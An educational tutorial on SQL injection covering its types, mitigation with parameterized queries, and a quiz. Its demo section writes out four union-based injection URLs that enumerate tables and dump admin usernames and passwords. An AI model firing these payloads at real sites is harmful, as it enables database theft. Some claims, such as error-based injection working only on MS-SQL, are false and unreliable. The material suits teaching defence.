SQL Injection Attack


Reading time: 16 minutes

SQL(Structured Query Language) Attack is a cyber attack used for the manipulation of the backend database through the malicious SQL Query. The attack allows a hacker to cause repudiation issues and spoof the identity. The attack also allows the complete exposure of the database which later can be used for the malicious purpose. The hacker if wanted can even destroy the data or do modification in the database.

Procedure For The Attack

Attack Procedure is as follows:

  • Hacker first searches for the website in which the parameter of HTML are not properly validated (i.e. tags are not closed etc.) by running malicious SQL queries on the website.

  • While running the queries if error related to SQL is displayed on the webpage. This gives the hint to the hacker that the page is vulnerable and he then ran further queries on the website.

  • He further finds the version number of the database and according to that the hacker applies the attack and run the queries and tries to retrieve the database and the information inside it.

  • The hacker then uses this information for the malicious activity such as cyberbullying, sending spam emails etc.

Types Of SQL Injection

There are mainly three types of SQL injection:

Union Based SQL Injection

  1. Union Based SQL Injection: In this type of SQL Injection Attack, the hacker uses Union statement to integrate two or more SQL commands to retrieve the data from the database.

Blind SQL Injection

  1. Blind SQL Injection: In this type of SQL Injection Attack, the hacker extracts the data by asking the questions to the database.

Error Based SQL Injection

  1. Error Based SQL Injection: In this type of SQL Injection Attack, the hacker tries to cause an error in the application in order to extract the data from the database. The attack only works on MS-SQL Server.

Mitigation For The Attack

The attack can be prevented by properly validating the user-supplied input in the proper fields such as expected data types. In order to mitigate the attack ensure the proper design of the application. Also, use proper stored procedures and parameterized queries to avoid the attack. Don’t leave any sensitive data in the plaintext and applyv proper encryption algorithm on the data.

Demo Of The SQL Injection

First the hacker check for the error

  1. http://www.demo[.]com/faculty/profile.php?id=1' -- -

If error is shown then the hacker try to find out the tables.

  1. http://www.demo[.]com/faculty/profile.php?id=96'union select table_name,2,3,4,5,6,7,8 from information_schema.tables-- -

After this the hacker then tries to find all the table name in a single time only and for that he uses group concat function.

  1. http://www.demo[.]com/faculty/profile.php?id=96' union select group_concat(table_name),2,3,4,5,6,7,8 from information_schema.tables-- -

After this the hacker then finally uses the table which is usable for him and tries to find out the admin password for logging in the database.

  1. http://www.demo[.]com/faculty/profile.php?id=96' union select group_concat(id,0x3a,uname,0x3a,upassword),2,3,4,5,6,7,8 from useraccounts-- -

So this are a demo of some main steps that a hacker follow during the SQL Injection.

Image For Understanding The Process

Pic

MCQ Round

Question 1

What hackers first do to check wether the SQL Injection Attack can be done or not?

Find the unvalidated parameter and run SQL query
Directly run the SQL queries on the website
Search the SQL impacted websites on search engines
Tries to find the version number of the database.

Question 2

What does SQL stands for

Structured Question Language
Structured Query Language
Search Query Language
Search Question Language.